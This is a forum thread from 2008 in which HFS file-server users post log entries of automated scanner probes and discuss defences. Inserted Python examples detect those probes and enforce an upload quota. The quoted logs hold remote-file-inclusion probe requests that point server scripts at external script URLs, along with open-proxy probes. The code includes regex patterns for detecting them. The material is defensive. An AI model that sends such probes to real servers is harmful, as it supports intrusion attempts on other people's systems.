rejetto forum

help, i am being hacked/monitored

yair · 20 · 23546


yair (Occasional poster, Posts: 9)
Hello HFS friends.
I have been using my HFS for several months now. I love it.
Lately I have been going through my logs and see some strange activity.
Someone is systematically downloading my file lists using what I assume is a PHP script and hosting these file lists on different subdomains. The root of those subdomains looks innocent, which makes me believe it's a parasite user of those domains.

a common log entry will look like

00:52:50 xxx.xxx.97.30:37359 Requested GET /~files.lst?hxxp://www.meijers.com/images/products/mor/dawo/

When I follow the address I get
<?php echo md5("just_a_test");?>

What can I do, am I being paranoid? I tried banning those IPs but they just keep coming with new ones. I hate to cripple my HFS because of stuff like that. Rules? Disable something?

thank you.


Foggy (Tireless poster, Posts: 806)
Probably the easiest thing is to enable user accounts and don't give anonymous users access to anything. That way when a file list is downloaded it won't contain anything important; it will only contain what anonymous users can access.

BTW, I just noticed that it isn't a recursive list, so they are only getting a list of the files/folders in your root directory.

Edit:
Does the log entry always have that URL on the end of /~files.lst?

Rejetto, do macros work on the filelist.tpl?
« Last Edit: January 21, 2008, 03:06:15 PM by Foggy »


yair (Occasional poster, Posts: 9)
Thanks for the reply; yes, it always includes the address.
I prefer it to stay open. I don't like passwords but I may have to get used to it.


rejetto (Administrator, Tireless poster, Posts: 13524)
The request in your log is made by a malicious program scanning the net for vulnerable servers (that is, misconfigured or buggy software).
The current HFS version has no known vulnerabilities, which means there's no actual risk. You were "tested", but with no effect.

Your HFS is currently open to anyone.
That's not a problem while you don't have stuff that you want to be available to anyone.

@foggy: yes, AFAIK



parade (Tireless poster, Posts: 138)
What's happening here:

24.01.2008 12:45:51 70.151.172.133:9348 Requested GET http://www.ebay.com/
24.01.2008 12:45:51 70.151.172.133:9348 Not served: 400 - Bad request

Why would somebody want to connect to eBay through my site?


Foggy (Tireless poster, Posts: 806)
It is probably just a bot crawling the web looking for vulnerable sites/servers using a request for ebay as cover.
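Rejetto's reading of yair's request and Foggy's reading of the eBay request are two scanner patterns that can be picked out of an HFS log mechanically: a remote URL stuffed into the query string, and a request line whose target is an absolute URL. The Python below is an added example, not code from HFS or from anyone in this thread; it assumes the log line shapes quoted here and uses the thread's own log lines as sample input (the last line is constructed).

```python
import re

# Shape of the HFS log lines quoted in this thread: optional date, time,
# ip:port, "Requested" METHOD target. Masked IPs like xxx.xxx.97.30 are accepted.
LOG_RE = re.compile(
    r"^(?:\d{2}[./]\d{2}[./]\d{4}\s+)?\d{2}:\d{2}:\d{2}\s+"
    r"(?P<ip>[\dx.]+):\d+\s+Requested\s+(?P<method>[A-Z]+)\s+(?P<target>\S+)"
)
# Remote URL at the start of a value ("hxxp" is the thread's defanged spelling).
REMOTE_URL = re.compile(r"^(?:hxxp|https?|ftp)://", re.IGNORECASE)

def classify(line):
    """Return (ip, label) for a 'Requested' line, None for anything else
    (e.g. the 'Not served: 400' lines HFS writes afterwards)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target = m.group("ip"), m.group("target")
    # Target is an absolute URL: the client asked HFS to fetch another site,
    # i.e. an open-proxy probe. HFS answers 400, as parade's log shows.
    if REMOTE_URL.match(target):
        return ip, "proxy-probe"
    # Query string carrying a remote URL, keyed ("thisdir=http://...") or
    # bare ("?hxxp://..."): the usual remote-file-inclusion scanner pattern.
    # HFS serves static files, so the request is inert, but it is worth tallying.
    query = target.partition("?")[2]
    for part in query.split("&"):
        if REMOTE_URL.match(part.split("=", 1)[-1]):
            return ip, "rfi-probe"
    return ip, "normal"

def scan(lines):
    """Map each probing IP to the set of probe labels seen from it."""
    hits = {}
    for line in lines:
        result = classify(line)
        if result and result[1] != "normal":
            hits.setdefault(result[0], set()).add(result[1])
    return hits

# The first four lines are quoted from the thread; the last is a constructed benign request.
SAMPLE_LOG = [
    "00:52:50 xxx.xxx.97.30:37359 Requested GET /~files.lst?hxxp://www.meijers.com/images/products/mor/dawo/",
    "24.01.2008 12:45:51 70.151.172.133:9348 Requested GET http://www.ebay.com/",
    "24.01.2008 12:45:51 70.151.172.133:9348 Not served: 400 - Bad request",
    "30/01/2008 14:29:32 62.193.242.210:56513 Requested HEAD /admin/business_inc/saveserver.php?thisdir=http://styling.dk/script/img.txt?",
    "00:53:10 192.0.2.10:40000 Requested GET /docs/readme.txt",
]
```

`scan(SAMPLE_LOG)` returns the three probing addresses with their labels; as yair noticed, the addresses change constantly, so the tally is more useful for judging how much of the log is scanner noise than as a ban list.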


TooL (Occasional poster, Posts: 8)
In the FAQ there is this:

- How do I protect my files on the HFS server? Are they safe from Internet hackers? 
You can set a username and password for a file by right-clicking the file and selecting "Set user/pass". This will not, however, protect your files from prying eyes when they are downloaded by an authorized user since HFS does not encrypt the data that is being sent. For more information, see Secure your server.

Is the best way to "Secure your server" to enable accounts and only allow those accounts access, with no anonymous users? Or is there an even better way or some additional steps to take?

NVM - found the info here:

http://www.rejetto.com/wiki/index.php?title=HFS:_Secure_your_server

Thanks :o
« Last Edit: January 31, 2008, 03:33:34 AM by TooL »


ELEVENNNN (Tireless poster, Posts: 257)
Completely off topic, but Tool is the best band ever, I think I love you... if you didn't mean the band then I basically hate you.

Keep on rockin', as rejetto says.
« Last Edit: January 31, 2008, 06:13:29 AM by ELEVENNNN »


TCube (Tireless poster, Posts: 440)
Malicious programs are particularly active these days :-[

Quote
30/01/2008 14:29:32 62.193.242.210:56513 Requested HEAD /admin/business_inc/saveserver.php?thisdir=http://styling.dk/script/img.txt?
31/01/2008 05:40:51 217.10.33.140:1871 Requested GET http://www.yahoo.com/

I still want some parts of HFS to "be open". Is lowering "connection inactivity time out" one way to quickly kick out those attempted connections?

Another thing [possible risk]: some "open uploads" are possible with my HFS settings [i.e. technical docs, photo workshop, ...]. I would like a feature opposite to the actual one [see attch.].
Seems to me that setting a "max. upload HDD limit" - for example 10/20 Mo in my case - would be plenty for casual use.

Thanks Rejetto for thinking of it ;)
TCube
« Last Edit: January 31, 2008, 08:21:14 AM by TCube »
Make it idiot-proof and I will make a better idiot


Foggy (Tireless poster, Posts: 806)
I have had some weird activity as well, with requests for www.microsoft.com. I simply changed the port HFS is on to something besides 80 and it has been mostly fine since.


TCube (Tireless poster, Posts: 440)
Well, in my case I bloody can't change port 80... it's the only one not filtered by my ISP's Cisco routers' QoS (*).

(*) Silly game of "cat and mouse" or "They Know We Know"
« Last Edit: January 31, 2008, 09:15:51 AM by TCube »


rejetto (Administrator, Tireless poster, Posts: 13524)
Quote
Malicious programs are particularly active these days :-[

Who cares? You should just re-enable Log -> Only served requests.

Quote
Is lowering "connection inactivity time out"  one way quickly to kick out those attempted connections ?

A "bad" request takes 1-2 seconds. There's no inactivity in it.

Quote
Seems to me that setting a "max. upload HDD limit" - for example 10/20Mo in my case - would be plenty for casual use.

Of course that's the first feature I thought of.
Then I realized I didn't have a way to know the amount of total upload.
Indeed there's reason to think all the content of an uploadable folder has been uploaded. The admin could put stuff in it.
At best I could make a feature "upload fails if there's more than X megabytes in this folder".


MarkV (Tireless poster, Posts: 764)
Quote from: rejetto
at best i could make a feature "upload fails if there's more than X megabytes in this folder".

I just wanted to say that. ;) It would at least prevent malicious users from misusing upload folders (warez storage or the like).

Of course the best would be a different setting for registered and unregistered users, like unregistered users can only upload if less than 50MiB are in the folder, but registered up to 200.
http://worldipv6launch.org - The world is different now.


TCube (Tireless poster, Posts: 440)
Rejetto, yes, "upload fails if there's more than X megabytes in this folder" would be useful.
I see it this way, MarkV: all "upload folders" for non-registered users point to the same HD directory [limit is 10]; other "upload folders" for registered users point to different directories with different settings [20/50/100/700/unlimited etc.].
That leaves us mentioning "this rule" somewhere on the front end, avoiding users losing their time.
Would that be OK?
TCube
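Rejetto's "upload fails if there's more than X megabytes in this folder", combined with MarkV's registered/unregistered split, as an added Python example; this is not HFS code and not an HFS setting. It assumes the upload's size is known up front from Content-Length, and it counts uploads still in flight, because two simultaneous uploads would otherwise each see the same folder size and both get through.

```python
import os
import tempfile
import threading

# Per-user-class ceiling on what an upload folder may hold. The 50/200 MiB
# split is MarkV's suggestion; tiering by class is this example's assumption.
DEFAULT_LIMITS = {"anonymous": 50 << 20, "registered": 200 << 20}

def folder_bytes(path):
    """Bytes already in the folder. Admin-placed files count too; the server
    cannot tell them from uploads, hence checking the folder total."""
    with os.scandir(path) as entries:
        return sum(e.stat(follow_symlinks=False).st_size
                   for e in entries if e.is_file(follow_symlinks=False))

class UploadQuota:
    """'Upload fails if there's more than X megabytes in this folder', decided
    from the request's Content-Length before any body bytes are accepted."""
    def __init__(self, folder, limits=DEFAULT_LIMITS):
        self.folder, self.limits = folder, limits
        self.reserved = 0            # bytes of uploads in flight, not yet on disk
        self.lock = threading.Lock()

    def begin(self, user_class, content_length):
        """Reserve room for an upload; False means reject. In-flight uploads are
        counted so two concurrent uploads cannot both slip under the ceiling."""
        limit = self.limits.get(user_class, 0)   # unknown class: nothing allowed
        with self.lock:
            if folder_bytes(self.folder) + self.reserved + content_length > limit:
                return False
            self.reserved += content_length
            return True

    def finish(self, content_length):
        """Release the reservation once the file is on disk (or the upload failed)."""
        with self.lock:
            self.reserved -= content_length

def demo():
    """Constructed scenario: a 30-byte admin-placed file, byte-sized limits."""
    with tempfile.TemporaryDirectory() as folder:
        with open(os.path.join(folder, "admin-placed.txt"), "wb") as f:
            f.write(b"x" * 30)
        quota = UploadQuota(folder, limits={"anonymous": 50, "registered": 200})
        a = quota.begin("anonymous", 20)    # 30 + 20 = 50: fits exactly
        b = quota.begin("anonymous", 1)     # 30 + 20 in flight + 1 > 50: rejected
        c = quota.begin("registered", 100)  # registered ceiling is 200: fits
        quota.finish(20)                    # first upload done (file not written here)
        d = quota.begin("anonymous", 1)     # 30 + 100 in flight + 1 > 50: rejected
        return a, b, c, d
```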